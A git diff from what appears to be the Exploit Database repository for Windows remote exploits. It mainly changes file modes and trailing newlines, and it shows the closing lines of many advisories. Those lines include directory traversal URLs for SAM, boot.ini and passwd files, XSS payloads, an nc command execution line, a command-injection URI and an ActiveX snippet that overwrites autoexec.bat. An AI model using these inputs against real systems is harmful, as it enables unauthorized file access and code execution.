b/platforms/windows/remote/25157.txt old mode 100755 new mode 100644 index e0da2e6b5..adf0aed3c --- a/platforms/windows/remote/25157.txt +++ b/platforms/windows/remote/25157.txt @@ -10,4 +10,4 @@ classid="clsid:{DE4735F3-7532-4895-93DC-9A10C4257173}"></object> ctl.initsink "C:\autoexec.bat" ctl.addstring "echo Drive formatted? ", "" ctl.deinitsink -</script> \ No newline at end of file +</script> \ No newline at end of file diff --git a/platforms/windows/remote/25163.txt b/platforms/windows/remote/25163.txt old mode 100755 new mode 100644 index 14589f3be..e30635e64 --- a/platforms/windows/remote/25163.txt +++ b/platforms/windows/remote/25163.txt @@ -4,4 +4,4 @@ A vulnerability has been identified in the handling of certain types of requests The problem is in the handling of directory traversal strings. This issue could be exploited to gain read access to files on a host using the vulnerable software. -http://www.example.com/../../../windows/repair/sam \ No newline at end of file +http://www.example.com/../../../windows/repair/sam \ No newline at end of file diff --git a/platforms/windows/remote/25166.c b/platforms/windows/remote/25166.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25167.c b/platforms/windows/remote/25167.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25187.txt b/platforms/windows/remote/25187.txt old mode 100755 new mode 100644 index 8043ac3f6..439efda58 --- a/platforms/windows/remote/25187.txt +++ b/platforms/windows/remote/25187.txt @@ -4,4 +4,4 @@ CProxy is reported prone to a remote directory traversal vulnerability. This iss It is reported that an attacker can simply issue an HTTP GET request including directory traversal sequences to carry out this attack. -GET http://../../[file] HTTP/1.0 \ No newline at end of file +GET http://../../[file] HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/25188.txt b/platforms/windows/remote/25188.txt old mode 100755 new mode 100644 index 0867919ed..6a0f8532f --- a/platforms/windows/remote/25188.txt +++ b/platforms/windows/remote/25188.txt @@ -154,4 +154,4 @@ action="http://www.example.com/cgi-bin/ask2.cgi"> <input type=submit value="Upload" onclick="document.XA.XB.value=document.XA.RFC1867.value;return true" > </form> -- --------------------------- \ No newline at end of file +- --------------------------- \ No newline at end of file diff --git a/platforms/windows/remote/25194.txt b/platforms/windows/remote/25194.txt old mode 100755 new mode 100644 index 14a0bf7eb..4b36ff17c --- a/platforms/windows/remote/25194.txt +++ b/platforms/windows/remote/25194.txt @@ -8,4 +8,4 @@ Another issue affecting the application may allow remote users to disclose an ad These issues are reported to affect Hosting Controller 6.1 Hotfix 1.7. Other versions are likely to be affected as well. -http://www.example.com/admin/logs/HCDiskQuotaService.csv \ No newline at end of file +http://www.example.com/admin/logs/HCDiskQuotaService.csv \ No newline at end of file diff --git a/platforms/windows/remote/25195.txt b/platforms/windows/remote/25195.txt old mode 100755 new mode 100644 index 4b9f18621..48beeccaa --- a/platforms/windows/remote/25195.txt +++ b/platforms/windows/remote/25195.txt @@ -41,4 +41,4 @@ directory referenced by begin UTL_FILE.frename('MEDIA_DIR','\\.\\..\\.\\..\\.\\FileToRename','MEDIA_DIR','\\.\\..\\.\\..\\.\\Unbreakable.txt',TRUE); -end; \ No newline at end of file +end; \ No newline at end of file diff --git a/platforms/windows/remote/25196.txt b/platforms/windows/remote/25196.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25207.txt b/platforms/windows/remote/25207.txt old mode 100755 new mode 100644 index a263d6e37..560ff5a64 --- a/platforms/windows/remote/25207.txt +++ b/platforms/windows/remote/25207.txt @@ -20,4 +20,4 @@ A remote attacker may exploit this issue to gain information regarding the files http://www.example.com:8080/Filelist.html http://www.example.com:8080/A:\a.txt -http://www.example.com:8080/a \ No newline at end of file +http://www.example.com:8080/a \ No newline at end of file diff --git a/platforms/windows/remote/25274.html b/platforms/windows/remote/25274.html old mode 100755 new mode 100644 index 0391fcd10..aa4a0bf78 --- a/platforms/windows/remote/25274.html +++ b/platforms/windows/remote/25274.html @@ -24,4 +24,4 @@ window.setInterval('sniff()',100); <body onload="body_onload()"> Information typed in Maxthon's search bar will be displayed here: <input type="text" id="s" value='' readonly="true" /> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/25319.txt b/platforms/windows/remote/25319.txt old mode 100755 new mode 100644 index 286fbe088..25ed95ee3 --- a/platforms/windows/remote/25319.txt +++ b/platforms/windows/remote/25319.txt @@ -7,4 +7,4 @@ This issue could be exploited to gain read access to files on a host using the v This vulnerability is reported to affect FastStone 4in1 Browser version 1.2, previous versions might also be affected. http://www.example.com/.../.../.../.../.../.../windows/system.ini -http://www.example.com/..\..\..\..\..\..\..\..\windows/system.ini \ No newline at end of file +http://www.example.com/..\..\..\..\..\..\..\..\windows/system.ini \ No newline at end of file diff --git a/platforms/windows/remote/25325.txt b/platforms/windows/remote/25325.txt old mode 100755 new mode 100644 index ad591e686..028806a87 --- a/platforms/windows/remote/25325.txt +++ b/platforms/windows/remote/25325.txt @@ -13,4 +13,4 @@ filename = argv[1]; str2ba(argv[2], &bdaddr); channel = (argc > 3) ? atoi(argv[3]) : 10; -The modified obextool client may then be used to push a malicious file to a target computer. \ No newline at end of file +The modified obextool client may then be used to push a malicious file to a target computer. \ No newline at end of file diff --git a/platforms/windows/remote/25336.txt b/platforms/windows/remote/25336.txt old mode 100755 new mode 100644 index 6ffbc4ab5..6ebfba915 --- a/platforms/windows/remote/25336.txt +++ b/platforms/windows/remote/25336.txt @@ -8,4 +8,4 @@ Information disclosed through this attack may expose sensitive data that may be http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=c:\&VAR_FT_TMPL=winnt/win.ini -http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd \ No newline at end of file +http://www.example.com/logwebcgi/logwebftbs2000.exe?VAR_FT_LANG=/etc&VAR_FT_TMPL=passwd \ No newline at end of file diff --git a/platforms/windows/remote/25365.txt b/platforms/windows/remote/25365.txt old mode 100755 new mode 100644 index b18f8ef11..8a5af4b0f --- a/platforms/windows/remote/25365.txt +++ b/platforms/windows/remote/25365.txt @@ -15,4 +15,4 @@ http://www.example.com/a%20HTTP/1.0"%20200%202048%0d%0a255.255.255.255%20-%20-%2 http://www.example.com/%0d%0atype%20cgi-bin%5Ctest.bat To parse a command through 'cmdIS.DLL': -http://www.example.com/scripts/cmdIS.dll/httpd.log \ No newline at end of file +http://www.example.com/scripts/cmdIS.dll/httpd.log \ No newline at end of file diff --git a/platforms/windows/remote/25384.c b/platforms/windows/remote/25384.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25385.cpp b/platforms/windows/remote/25385.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25386.txt b/platforms/windows/remote/25386.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25421.txt b/platforms/windows/remote/25421.txt old mode 100755 new mode 100644 index 55e8721d7..eee849174 --- a/platforms/windows/remote/25421.txt +++ b/platforms/windows/remote/25421.txt @@ -17,4 +17,4 @@ Cache-Control: no-cache Referer: https://www.example.com/ Content-Length: 135 -stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6 \ No newline at end of file +stage=useridandpasscode&referrer=Z2F&sessionid=0&postdata="><script>alert("Vulnerable")</script>&authntype=2&username=asdf&passcode=jkl%F6 \ No newline at end of file diff --git a/platforms/windows/remote/25454.txt b/platforms/windows/remote/25454.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25486.txt b/platforms/windows/remote/25486.txt old mode 100755 new mode 100644 index 567900ed5..b2c2e9bfb --- a/platforms/windows/remote/25486.txt +++ b/platforms/windows/remote/25486.txt @@ -6,4 +6,4 @@ This vulnerability allows a remote attacker to read files outside of the FTP doc This issue was reported to affect all versions of RaidenFTPD prior to 2.4.2241. -quote site urlget file://\..\\boot.ini \ No newline at end of file +quote site urlget file://\..\\boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/25487.txt b/platforms/windows/remote/25487.txt old mode 100755 new mode 100644 index be8e43d22..9d0046413 --- a/platforms/windows/remote/25487.txt +++ b/platforms/windows/remote/25487.txt @@ -4,4 +4,4 @@ Yawcam is prone to a directory traversal vulnerability that could allow attacker GET ..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0 -GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0 \ No newline at end of file +GET \..\..\..\..\..\..\..\..\windows\system.ini HTTP/1.0 \ No newline at end of file diff --git a/platforms/windows/remote/25546.txt b/platforms/windows/remote/25546.txt old mode 100755 new mode 100644 index ea282c434..9c629cef2 --- a/platforms/windows/remote/25546.txt +++ b/platforms/windows/remote/25546.txt @@ -4,4 +4,4 @@ A remote cross-site scripting vulnerability affects BEA WebLogic Server and WebL An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://example.com:8001/console/actions/jndi/JndiFramesetAction?server='<script>alert(document.cookie);</script>mydomain%3AName%3Dmyserver%2CType%3DS \ No newline at end of file +http://example.com:8001/console/actions/jndi/JndiFramesetAction?server='<script>alert(document.cookie);</script>mydomain%3AName%3Dmyserver%2CType%3DS \ No newline at end of file diff --git a/platforms/windows/remote/25557.txt b/platforms/windows/remote/25557.txt old mode 100755 new mode 100644 index bd4211ccf..9ad3390db --- a/platforms/windows/remote/25557.txt +++ b/platforms/windows/remote/25557.txt @@ -5,4 +5,4 @@ A remote command execution vulnerability affects HP OpenView Radia Management Po An unauthenticated, remote attacker may leverage this issue to execute arbitrary commands on an affected computer with Local System privileges on the Microsoft Windows platform and elevated privileges on UNIX-based platforms. bash$ printf "\x00\x00\x00../../windows/system32/whoami.exe\x00" | nc -v -xx.xx.xx.xx 1065 \ No newline at end of file +xx.xx.xx.xx 1065 \ No newline at end of file diff --git a/platforms/windows/remote/25571.txt b/platforms/windows/remote/25571.txt old mode 100755 new mode 100644 index 48eec7174..7abce402d --- a/platforms/windows/remote/25571.txt +++ b/platforms/windows/remote/25571.txt @@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/13456/info Video Cam Server is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. http://www.example.com/..\..\..\..\..\..\..\..\..\..\..\windows\system.ini -GET /../../../../../../../../../../../windows/system.ini HTTP/1.1 \ No newline at end of file +GET /../../../../../../../../../../../windows/system.ini HTTP/1.1 \ No newline at end of file diff --git a/platforms/windows/remote/25572.txt b/platforms/windows/remote/25572.txt old mode 100755 new mode 100644 index bb3e4bacb..b3d85a5c2 --- a/platforms/windows/remote/25572.txt +++ b/platforms/windows/remote/25572.txt @@ -4,4 +4,4 @@ Video Cam Server is prone to a path disclosure issue when invalid data is submit This issue can allow an attacker to access sensitive data that may be used to launch further attacks against a vulnerable computer. -http://www.example.com/%20 \ No newline at end of file +http://www.example.com/%20 \ No newline at end of file diff --git a/platforms/windows/remote/25573.txt b/platforms/windows/remote/25573.txt old mode 100755 new mode 100644 index 3a624bba9..3c5987003 --- a/platforms/windows/remote/25573.txt +++ b/platforms/windows/remote/25573.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13459/info Video Cam Server is prone to an authentication bypass vulnerability. This vulnerability exists because Video Cam Server fails to control access to the administrative interface. -http://www.example.com/admin.html \ No newline at end of file +http://www.example.com/admin.html \ No newline at end of file diff --git a/platforms/windows/remote/25597.txt b/platforms/windows/remote/25597.txt old mode 100755 new mode 100644 index d0865ccb8..5fb15f1ad --- a/platforms/windows/remote/25597.txt +++ b/platforms/windows/remote/25597.txt @@ -26,4 +26,4 @@ else alert('File exists.'); } window.location.reload(false); -} \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/windows/remote/25600.txt b/platforms/windows/remote/25600.txt old mode 100755 new mode 100644 index 5afafa6f2..9186abcb2 --- a/platforms/windows/remote/25600.txt +++ b/platforms/windows/remote/25600.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/13495/info SimpleCam is prone to a directory traversal vulnerability that could allow attackers to read files outside the Web root. -http://example.com/..\..\..\..\..\..\..\..\..\..\..\..\windows\system.ini \ No newline at end of file +http://example.com/..\..\..\..\..\..\..\..\..\..\..\..\windows\system.ini \ No newline at end of file diff --git a/platforms/windows/remote/25621.txt b/platforms/windows/remote/25621.txt old mode 100755 new mode 100644 index 42fcae379..eec4794f1 --- a/platforms/windows/remote/25621.txt +++ b/platforms/windows/remote/25621.txt @@ -6,4 +6,4 @@ It is reported that an attacker can exploit this issue to detect the presence of A successful attack may aid in further attacks against the system or lead to a crash due to resource exhaustion. -http://www.example.com/mail?A=/../../../../../../../[file] \ No newline at end of file +http://www.example.com/mail?A=/../../../../../../../[file] \ No newline at end of file diff --git a/platforms/windows/remote/25643.txt b/platforms/windows/remote/25643.txt old mode 100755 new mode 100644 index 03999227f..3869385fd --- a/platforms/windows/remote/25643.txt +++ b/platforms/windows/remote/25643.txt @@ -8,4 +8,4 @@ GeoVision Digital Surveillance System versions 6.04 or 6.1 are reportedly vulner http://www.example.com/cam1.jpg http://www.example.com/cam2.jpg -http://www.example.com/cam[1-16].jpg \ No newline at end of file +http://www.example.com/cam[1-16].jpg \ No newline at end of file diff --git a/platforms/windows/remote/25646.txt b/platforms/windows/remote/25646.txt old mode 100755 new mode 100644 index e49440c46..788a9feb2 --- a/platforms/windows/remote/25646.txt +++ b/platforms/windows/remote/25646.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th This issue reportedly affects myServer version 0.8 for Microsoft Windows; other versions may also be affected. -http://www.example.com/.../.../"onmouseover="[code]" \ No newline at end of file +http://www.example.com/.../.../"onmouseover="[code]" \ No newline at end of file diff --git a/platforms/windows/remote/25652.txt b/platforms/windows/remote/25652.txt old mode 100755 new mode 100644 index 65b167b68..3c913c95a --- a/platforms/windows/remote/25652.txt +++ b/platforms/windows/remote/25652.txt @@ -10,4 +10,4 @@ Map account to a drive: net use [drive]: \\[server]\[user]$ Change directory to target folder: -cd 'My files' \ No newline at end of file +cd 'My files' \ No newline at end of file diff --git a/platforms/windows/remote/25694.txt b/platforms/windows/remote/25694.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25695.txt b/platforms/windows/remote/25695.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25696.txt b/platforms/windows/remote/25696.txt old mode 100755 new mode 100644 index 8e3dc1564..bf0ec9d5a --- a/platforms/windows/remote/25696.txt +++ b/platforms/windows/remote/25696.txt @@ -10,4 +10,4 @@ Host: www.example.com Accept: */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) -Referer: "></a><script>alert('XSS')</script> \ No newline at end of file +Referer: "></a><script>alert('XSS')</script> \ No newline at end of file diff --git a/platforms/windows/remote/25697.txt b/platforms/windows/remote/25697.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25698.txt b/platforms/windows/remote/25698.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25713.txt b/platforms/windows/remote/25713.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25755.txt b/platforms/windows/remote/25755.txt old mode 100755 new mode 100644 index 10b376c1a..db0b3cbf2 --- a/platforms/windows/remote/25755.txt +++ b/platforms/windows/remote/25755.txt @@ -10,4 +10,4 @@ http://www.example.com:1272/..%2F..%2F..%2F..%2F..%2F../windows/repair/sam http://www.example.com:1272/.../.../.../.../.../.../.../.../.../boot.ini http://www.example.com:1272/../../ ../../../../../../../boot.ini http://www.example.com:1272/../../../../../../../../boot.ini -http://www.example.com:1272/../../../../boot.ini \ No newline at end of file +http://www.example.com:1272/../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/25784.txt b/platforms/windows/remote/25784.txt old mode 100755 new mode 100644 index 62c761bbc..a9e7ae1b0 --- a/platforms/windows/remote/25784.txt +++ b/platforms/windows/remote/25784.txt @@ -45,4 +45,4 @@ ze:40px;"><b>YOU ARE VULNERABLE!!!</b><br><br><br>Regards,<br><br> Benjamin Tobias Franz<br>Germany</body> --btf-- -===>>> PoC - End <<<=== \ No newline at end of file +===>>> PoC - End <<<=== \ No newline at end of file diff --git a/platforms/windows/remote/25822.xml b/platforms/windows/remote/25822.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25835.html b/platforms/windows/remote/25835.html old mode 100755 new mode 100644 index 7de09466d..015352ca6 --- a/platforms/windows/remote/25835.html +++ b/platforms/windows/remote/25835.html @@ -158,4 +158,4 @@ the ROP is from an os dll: [msi.dll] (C:\WINDOWS\system32\msi.dll) 3.1.4001.5512 </script> </body> -</html> \ No newline at end of file +</html> \ No newline at end of file diff --git a/platforms/windows/remote/25841.txt b/platforms/windows/remote/25841.txt old mode 100755 new mode 100644 index 8e5289131..9845ea576 --- a/platforms/windows/remote/25841.txt +++ b/platforms/windows/remote/25841.txt @@ -6,4 +6,4 @@ Information obtained in this manner may be used by the attacker to launch furthe Yaws 1.55 and prior versions are affected. -http://www.example.com/dynamic.yaws%00 \ No newline at end of file +http://www.example.com/dynamic.yaws%00 \ No newline at end of file diff --git a/platforms/windows/remote/25933.txt b/platforms/windows/remote/25933.txt old mode 100755 new mode 100644 index f87a5577b..92c9b9c25 --- a/platforms/windows/remote/25933.txt +++ b/platforms/windows/remote/25933.txt @@ -4,4 +4,4 @@ SlimServe HTTP server is prone to directory traversal attacks due to improper sa This type of attack allows a malicious user to read files that exist outside of the Web server root directory. -http://www.example.com/.../.../ \ No newline at end of file +http://www.example.com/.../.../ \ No newline at end of file diff --git a/platforms/windows/remote/25948.txt b/platforms/windows/remote/25948.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/25989.txt b/platforms/windows/remote/25989.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2601.c b/platforms/windows/remote/2601.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26032.html b/platforms/windows/remote/26032.html old mode 100755 new mode 100644 index 1f561c06d..4c5f95d5e --- a/platforms/windows/remote/26032.html +++ b/platforms/windows/remote/26032.html @@ -13,4 +13,4 @@ end if <form action="script>/<script>window.open(%27file://C:\\Program Files\\SPIDynamics\\WebInspect\\Working\\vulnerability.htm%27)</script>" method=get> Please login:<br> <input type=submit value="Login"><br> <input type=hidden name='hidden' value="Login"><br> </form> -</BODY></HTML> \ No newline at end of file +</BODY></HTML> \ No newline at end of file diff --git a/platforms/windows/remote/26035.txt b/platforms/windows/remote/26035.txt old mode 100755 new mode 100644 index 44e1ac353..6467f64ea --- a/platforms/windows/remote/26035.txt +++ b/platforms/windows/remote/26035.txt @@ -5,4 +5,4 @@ Advanced Guestbook is prone to an HTML injection vulnerability. This issue is du Attacker-supplied HTML and script code would be executed in the context of the affected Web site, potentially allowing for theft of cookie-based authentication credentials. An attacker could also exploit this issue to control how the site is rendered to the user; other attacks are also possible. Set the following registry setting to exploit this vulnerability: -[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/5.0/User Agent/] (Default)= "Code to inject" \ No newline at end of file +[HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Internet Settings/5.0/User Agent/] (Default)= "Code to inject" \ No newline at end of file diff --git a/platforms/windows/remote/26044.txt b/platforms/windows/remote/26044.txt old mode 100755 new mode 100644 index f70dfec29..37677c9ed --- a/platforms/windows/remote/26044.txt +++ b/platforms/windows/remote/26044.txt @@ -6,4 +6,4 @@ Failure to sanitize the filename and path may result in compromise of the file s The following email attachment filename example was provided: -'../../../../../file.exe' \ No newline at end of file +'../../../../../file.exe' \ No newline at end of file diff --git a/platforms/windows/remote/26151.txt b/platforms/windows/remote/26151.txt old mode 100755 new mode 100644 index 45c63297e..7e27203e1 --- a/platforms/windows/remote/26151.txt +++ b/platforms/windows/remote/26151.txt @@ -190,4 +190,4 @@ a= a & a= a & "paraparaparaparaparaparaparaparaparaparaparaparaparaparaparapar" JagEditParola.Jtext=a ---></script> \ No newline at end of file +--></script> \ No newline at end of file diff --git a/platforms/windows/remote/26167.pl b/platforms/windows/remote/26167.pl index 4716afe5a..f05b9a49f 100755 --- a/platforms/windows/remote/26167.pl +++ b/platforms/windows/remote/26167.pl @@ -91,4 +91,4 @@ classid=\"CLSID:".$clsid."\"></object></body></html>\n". "Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin -print "$header $shellcode $code $footer"; \ No newline at end of file +print "$header $shellcode $code $footer"; \ No newline at end of file diff --git a/platforms/windows/remote/26196.txt b/platforms/windows/remote/26196.txt old mode 100755 new mode 100644 index 939f098bc..64f79a7a6 --- a/platforms/windows/remote/26196.txt +++ b/platforms/windows/remote/26196.txt @@ -11,4 +11,4 @@ $ printf "GET /<script>alert(document.cookie)</script>GomoR HTTP/1.0\r\n\r\n" | 2. Login into the Administration console 3. Go to the menu 'Network configurations/servers/myserver/' 4. Click on 'View server log' -5. Search for the string GomoR and click on the BEA-id event. \ No newline at end of file +5. Search for the string GomoR and click on the BEA-id event. \ No newline at end of file diff --git a/platforms/windows/remote/26221.txt b/platforms/windows/remote/26221.txt old mode 100755 new mode 100644 index a94a8b8c1..b2a09fa82 --- a/platforms/windows/remote/26221.txt +++ b/platforms/windows/remote/26221.txt @@ -5,4 +5,4 @@ Rediff Bol Instant Messenger is prone to an information disclosure vulnerability [script] var Obj = new ActiveXObject("Fetch.FetchContact.1"); alert(Obj.FullAddressBook(0,"","","")); -[/script] \ No newline at end of file +[/script] \ No newline at end of file diff --git a/platforms/windows/remote/26230.txt b/platforms/windows/remote/26230.txt old mode 100755 new mode 100644 index 69a988083..88bef3909 --- a/platforms/windows/remote/26230.txt +++ b/platforms/windows/remote/26230.txt @@ -11,4 +11,4 @@ Microsoft IIS 5.1 is vulnerable to this issue. GET /www/test.as%CF%80 HTTP/1.1 Translate: f Host: www.example.com -Connection: Close \ No newline at end of file +Connection: Close \ No newline at end of file diff --git a/platforms/windows/remote/26299.c b/platforms/windows/remote/26299.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26306.txt b/platforms/windows/remote/26306.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2637.c b/platforms/windows/remote/2637.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26374.txt b/platforms/windows/remote/26374.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26375.txt b/platforms/windows/remote/26375.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26376.txt b/platforms/windows/remote/26376.txt old mode 100755 new mode 100644 index c48108c53..df563275a --- a/platforms/windows/remote/26376.txt +++ b/platforms/windows/remote/26376.txt @@ -8,4 +8,4 @@ An attacker can retrieve a directory listing of any Web accessible folders. Info An attacker can perform cross-site scripting attacks. This may be leveraged to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks. -http://www.example.com/%00/<script>alert('X.S.S')</script> \ No newline at end of file +http://www.example.com/%00/<script>alert('X.S.S')</script> \ No newline at end of file diff --git a/platforms/windows/remote/26424.txt b/platforms/windows/remote/26424.txt old mode 100755 new mode 100644 index 632391c52..691a6297a --- a/platforms/windows/remote/26424.txt +++ b/platforms/windows/remote/26424.txt @@ -7,4 +7,4 @@ This issue may facilitate unauthorized remote access to the application in the c https://www.%22;+echo+'hello'+%3E+test.txt -Passing this URI to a script that uses a vulnerable version of Snoopy will result in a file called 'test.txt' containing 'hello'. \ No newline at end of file +Passing this URI to a script that uses a vulnerable version of Snoopy will result in a file called 'test.txt' containing 'hello'. \ No newline at end of file diff --git a/platforms/windows/remote/26460.c b/platforms/windows/remote/26460.c old mode 100755 new mode 100644 index d6a22c612..2df6112f3 --- a/platforms/windows/remote/26460.c +++ b/platforms/windows/remote/26460.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/15279/info Asus VideoSecurity Online is prone to a buffer overflow in the authentication mechanism of the included Web server. This issue only exists if authentication is enabled on the Web server. @@ -5,6 +6,7 @@ Asus VideoSecurity Online is prone to a buffer overflow in the authentication me The Web server included with Asus VideoSecurity Online is not enabled by default. This vulnerability is reported to affect Asus VideoSecurity Online 3.5.0 and earlier. +*/ /* by Luigi Auriemma */ #include <stdio.h> #include <stdlib.h> #include <string.h> #ifdef WIN32 diff --git a/platforms/windows/remote/26464.txt b/platforms/windows/remote/26464.txt old mode 100755 new mode 100644 index 732a7e777..eacd8ce3e --- a/platforms/windows/remote/26464.txt +++ b/platforms/windows/remote/26464.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/15291/info IPSwitch WhatsUp Small Business 2004 is prone to a directory traversal vulnerability. Successful exploitation could allow a remote attacker to gain access to files outside the Web root. Sensitive information may be obtained in this manner. -http://[address of server]:8022/../../../../../../../../../../../boot.ini \ No newline at end of file +http://[address of server]:8022/../../../../../../../../../../../boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/2649.c b/platforms/windows/remote/2649.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26491.txt b/platforms/windows/remote/26491.txt old mode 100755 new mode 100644 index 1957e0297..86d8fad09 --- a/platforms/windows/remote/26491.txt +++ b/platforms/windows/remote/26491.txt @@ -6,4 +6,4 @@ An attacker may leverage this issue to have arbitrary script code executed in th Antville version 1.1 is vulnerable; prior versions may also be affected. -http://www.example.com/antville/project/<script>alert('XSS');</script> \ No newline at end of file +http://www.example.com/antville/project/<script>alert('XSS');</script> \ No newline at end of file diff --git a/platforms/windows/remote/26497.c b/platforms/windows/remote/26497.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2651.c b/platforms/windows/remote/2651.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2657.html b/platforms/windows/remote/2657.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/266.c b/platforms/windows/remote/266.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26773.txt b/platforms/windows/remote/26773.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/26774.txt b/platforms/windows/remote/26774.txt old mode 100755 new mode 100644 index 9c859163e..98686f969 --- a/platforms/windows/remote/26774.txt +++ b/platforms/windows/remote/26774.txt @@ -4,4 +4,4 @@ LogiSphere is prone to multiple directory traversal vulnerabilities. These issue An attacker can exploit this vulnerability to retrieve arbitrary files from the vulnerable system in the context of the Web server process. Information obtained may aid in further attacks; other attacks are also possible. -http://www.example.com:8080/search?NS-query-pat=..\..\..\..\..\..\..\..\boot.ini \ No newline at end of file +http://www.example.com:8080/search?NS-query-pat=..\..\..\..\..\..\..\..\boot.ini \ No newline at end of file diff --git a/platforms/windows/remote/26775.txt b/platforms/windows/remote/26775.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/268.c b/platforms/windows/remote/268.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2689.c b/platforms/windows/remote/2689.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2690.c b/platforms/windows/remote/2690.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2699.c b/platforms/windows/remote/2699.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27024.txt b/platforms/windows/remote/27024.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27072.pl b/platforms/windows/remote/27072.pl index 10a16052d..6af474844 100755 --- a/platforms/windows/remote/27072.pl +++ b/platforms/windows/remote/27072.pl @@ -95,4 +95,4 @@ classid=\"CLSID:".$clsid."\"></object></body></html>\n". "Microsoft Internet Explorer Msdds.dll COM Object Remote Exploit\n"; # print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin -print "$header $shellcode $code $footer"; \ No newline at end of file +print "$header $shellcode $code $footer"; \ No newline at end of file diff --git a/platforms/windows/remote/27073.txt b/platforms/windows/remote/27073.txt old mode 100755 new mode 100644 index ddfa72de7..3bc512e88 --- a/platforms/windows/remote/27073.txt +++ b/platforms/windows/remote/27073.txt @@ -8,4 +8,4 @@ This vulnerability may be remotely exploited due to project files originating fr Visual Studio 2005 is reportedly vulnerable to this issue; other versions may also be affected. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27073.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/27073.zip \ No newline at end of file diff --git a/platforms/windows/remote/2729.pm b/platforms/windows/remote/2729.pm old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27325.txt b/platforms/windows/remote/27325.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27378.txt b/platforms/windows/remote/27378.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2743.html b/platforms/windows/remote/2743.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2749.html b/platforms/windows/remote/2749.html old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/275.c b/platforms/windows/remote/275.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27523.py b/platforms/windows/remote/27523.py index 352d86430..15dc79675 100755 --- a/platforms/windows/remote/27523.py +++ b/platforms/windows/remote/27523.py @@ -82,4 +82,4 @@ try: print "[-] Connection lost from " + target + ":28876 \r" except: print "[-] Could not connect to " + target + ":21\r" - sys.exit(0) \ No newline at end of file + sys.exit(0) \ No newline at end of file diff --git a/platforms/windows/remote/27526.txt b/platforms/windows/remote/27526.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/2753.c b/platforms/windows/remote/2753.c old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27565.txt b/platforms/windows/remote/27565.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27569.txt b/platforms/windows/remote/27569.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/remote/27577.txt b/platforms/windows/remote/27577.txt old mode 100755 new mode 